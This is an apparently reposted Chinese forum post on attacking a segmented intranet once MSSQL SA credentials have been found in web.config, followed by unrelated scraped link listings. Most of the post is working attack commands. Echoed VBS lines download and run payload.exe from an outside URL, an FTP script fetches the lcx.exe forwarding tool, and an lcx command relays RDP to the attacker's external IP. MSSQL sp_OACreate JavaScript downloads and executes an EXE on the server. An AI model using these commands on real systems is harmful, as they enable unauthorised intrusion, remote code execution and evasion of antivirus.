本文转自:http://bbs.blackbap.org/thread-6203-1-2.html

1. 服务器属内网环境,站库分离,通过web.config找到数据库服务库SA帐号密码,成功添加用户(192.168.0.206) 。
2.
Web服务器(192.168.0.203) 、数据库服务器(192.168.0.206)都存在symantec杀毒软件,不能转lcx.exe工具转发

3. 测试过其它的转发工具,要么被查杀,要么无法用,使用reDuh工具只能转发当前IP的,而且速度极慢,受不了0.0 。
4.
使用msfpayload生成的exe文件也被查杀,由于服务器是x64的,msfencode没有x64的编码器,所以没能反弹成功

思路1:关闭杀软,通过以下提供的命令下载文件(未测试)
思路2:使用msf
aspx反弹,然后进行转发及跨路由渗透(已成功)

正常思路:如果没有杀软,直接传lcx.exe到192.168.0.203上,然后使用以下命令转发192.168.0.206:
c:\lcx.exe
-slave 你的外网IP 51 192.168.0.206 3389                // 看了这个后,你们应该都懂的吧 0.0

DOS命令:(一条一条执行)

  1. echo Set Post = CreateObject("Msxml2.XMLHTTP") >>xxx.vbs
  2. echo Set Shell = CreateObject("Wscript.Shell") >>xxx.vbs
  3. echo Post.Open "GET","http://bbs.blackbap.org/payload.exe",0
    >>xxx.vbs
  4. echo Post.Send() >>xxx.vbs
  5. echo Set aGet = CreateObject("ADODB.Stream") >>xxxc.vbs
  6. echo aGet.Mode = 3 >>xxx.vbs
  7. echo aGet.Type = 1 >>xxx.vbs
  8. echo aGet.Open() >>xxx.vbs
  9. echo aGet.Write(Post.responseBody) >>xxx.vbs
  10. echo aGet.SaveToFile "c:\xxxc.exe",2 >>xxx.vbs
  11. echo wscript.sleep 1000 >>xxxc.vbs
  12. echo Shell.Run ("c:\xxx.exe") >>xxx.vbs

复制代码

  1. echo open 127.0.0.1>c:\ftp.dat
  2. echo admin>>c:\ftp.dat
  3. echo admin>>c:\ftp.dat
  4. echo binary>>c:\ftp.dat
  5. echo get lcx.exe>>c:\ftp.dat
  6. echo bye>>c:\ftp.dat
  7. ftp -s:c:\ftp.dat

复制代码

MSSQL 命令:

  1. DECLARE @js int
  2. EXEC sp_OACreate 'ScriptControl',@js OUT
  3. EXEC sp_OASetProperty @js, 'Language', 'JavaScript1.1'
  4. EXEC sp_OAMethod @js, 'Eval', NULL, 'var x = new
    ActiveXObject("Microsoft.XMLHTTP");x.Open("GET", "Url",0);x.Send();var s = new
    ActiveXObject("ADODB.Stream");s.Mode = 3;s.Type =
    1;s.Open();s.Write(x.responseBody);s.SaveToFile("C:\\windows\\自己设置保存的EXE文件名.exe",2);var
    r = new
    ActiveXObject("WScript.Shell");r.Run("C:\\windows\\自己设置保存的EXE文件名.exe");'

复制代码

  1. declare @o int, @f int, @t int, @ret int
  2. exec sp_oacreate 'scripting.filesystemobject', @o out
  3. exec sp_oamethod @o, 'createtextfile', @f out, 'C:\1.bat', 1
  4. exec @ret = sp_oamethod @f, 'writeline', NULL,'open IP'
  5. exec @ret = sp_oamethod @f, 'writeline', NULL,'ftp账号'
  6. exec @ret = sp_oamethod @f, 'writeline', NULL,'ftp密码'
  7. exec @ret = sp_oamethod @f, 'writeline', NULL,'get lcx.exe'
  8. exec @ret = sp_oamethod @f, 'writeline', NULL,'bye'

MSSQL站库分离情况的渗透思路的更多相关文章

  1. 小迪安全 Web安全 基础入门 - 第五天 - 资产架构&端口&应用&CDN&WAF&站库分离&负载均衡

    一.资产架构 1.Web单个源码指向安全,域名指向一个网站,网站对应一个程序.对应一个目录. 2.Web多个目录源码安全,搭建完一个网站后,在网站目录下搭建新的站点. 3.Web多个端口源码安全,与多 ...

  2. Android实训案例(九)——答题系统的思绪,自己设计一个题库的体验,一个思路清晰的答题软件制作过程

    Android实训案例(九)--答题系统的思绪,自己设计一个题库的体验,一个思路清晰的答题软件制作过程 项目也是偷师的,决心研究一下数据库.所以写的还是很详细的,各位看官,耐着性子看完,实现结果不重要 ...

  3. Oracle主库归档丢失,备库日志有gap,在不重建备库的情况下,恢复备库

    本文主要描述Oracle备库日志与主库日志之间有gap,切主库这部分gap的归档日志已经删除或丢失,如何在不重建备库的情况下,恢复备库. 欢迎转载,请注明作者.出处. 作者:张正 blog:http: ...

  4. vue项目实践-前后端分离关于权限的思路

    前后端分离后权限的思路 最近看到许多关于权限的思路,但好像都是使用动态加载路由的方式,现在也分享下我在项目中使用的解决方案. 前后端分离关于权限的处理每个人都不一样,根据项目选择制定合适的方案就好 我 ...

  5. Spring + iBatis 的多库横向切分简易解决思路

    国内私募机构九鼎控股打造APP,来就送 20元现金领取地址:http://jdb.jiudingcapital.com/phone.html内部邀请码:C8E245J (不写邀请码,没有现金送)国内私 ...

  6. SpringBoot 配置文件与依赖库分离打包配置

    一.应用场景 一般情况下我们对springboot应用打包时使用springboot的maven插件spring-boot-maven-plugin的maven进行打包,打包完成得到一个fatjar, ...

  7. phpmyadmin系列渗透思路连载(一)

    当拿到phpmyadin的站点后,我一般会尝试一下几种攻击手法: 1.通过弱口令进入后台,尝试into outfile写入一句话 条件:(1)有写的权限    (2)知道web绝对路径    (3)w ...

  8. 开源图编辑库 NebulaGraph VEditor 的设计思路分享

    本文首发于 NebulaGraph 公众号 NebulaGraph VEditor 是一个拥有高性能.高可定制的所见即所得图可视化编辑器前端库. NebulaGraph VEditor 底层基于 SV ...

  9. MSSQL订阅库索引对齐

    需求如下图: 在原来的架构中是每台web服务器都固定访问某一台数据库服务器,所以就造成了每台数据库订阅服务器上的索引不一致.现在的需求就是要把所有的订阅库上的索引调整为一致,为了就是实现高可用+负载均 ...

随机推荐

  1. UVA 10986 Sending email 最短路问题

    基本的最短路问题 就是数据需要稍微处理一下.(N比较大)dijkstra也要优化.不优化应该会T: #include <map> #include <set> #include ...

  2. django视图重定向

    # 原创,转载请留言联系 当请求访问到某个视图时,我们想让它重定向到其他页面,应该怎么做呢? 1.HttpResponseRedirect 需求:当我们访问127.0.0.1/my_redirect时 ...

  3. pandas read excel文件碰到的一个小问题

    今天利用pandas读取excel时,爆出如下错误: 代码为: import pandas as pd db_eua=pd.read_excel('db_eua.xlsx',sheetname='EU ...

  4. Codeforces Round #299 (Div. 2) B. Tavas and SaDDas【DFS/*进制思维/位运算/一个数为幸运数,当且仅当它的每一位要么是4,要么是7 ,求小于等于n的幸运数个数】

    B. Tavas and SaDDas time limit per test 1 second memory limit per test 256 megabytes input standard ...

  5. Qt如何学习(参考官方文档)

    Designers who are familiar with web development can start with QML 一共有四种安装工具 You have following opti ...

  6. Strobogrammatic Number -- LeetCode

    A strobogrammatic number is a number that looks the same when rotated 180 degrees (looked at upside ...

  7. 又是一年NOIP然鹅我考的是高数(虽然我没打并且内容与NOIP无关)(手动滑稽)

    好长时间没有写过总结了.也是高三结束,自招结束.成功的由国宝变为四害,整个人也是完全放松的,或者说是放肆的. 整个暑假都是游戏睡觉,游戏睡觉,也没有干什么有意义的事.有人说别人都在学习大一课程的时候我 ...

  8. C语言基础之自增自减运算符及注意事项

    1.具体用法 1: int b; 2: int a = 10; 3: // b = 10 + 12; 4: //b = (a++) + (++a); 5: 6: // b = 11 + 11; 7: ...

  9. 用Xcode6的Leaks检测内存泄漏

    用xcode打开项目之后,选择Product - Profile: 在弹出的窗口中选择Leaks: 然后在设备解锁的情况下,选择Leaks再点击左上角的红色按钮开始运行APP: 红色的柱子表示有内存泄 ...

  10. Orchard FAQ

    Orchard学习视频已登录百度传课: http://www.chuanke.com/3027295-124882.html 问:Orchard用VS重新生成后为什么那么大? 答:因为每个模块的bin ...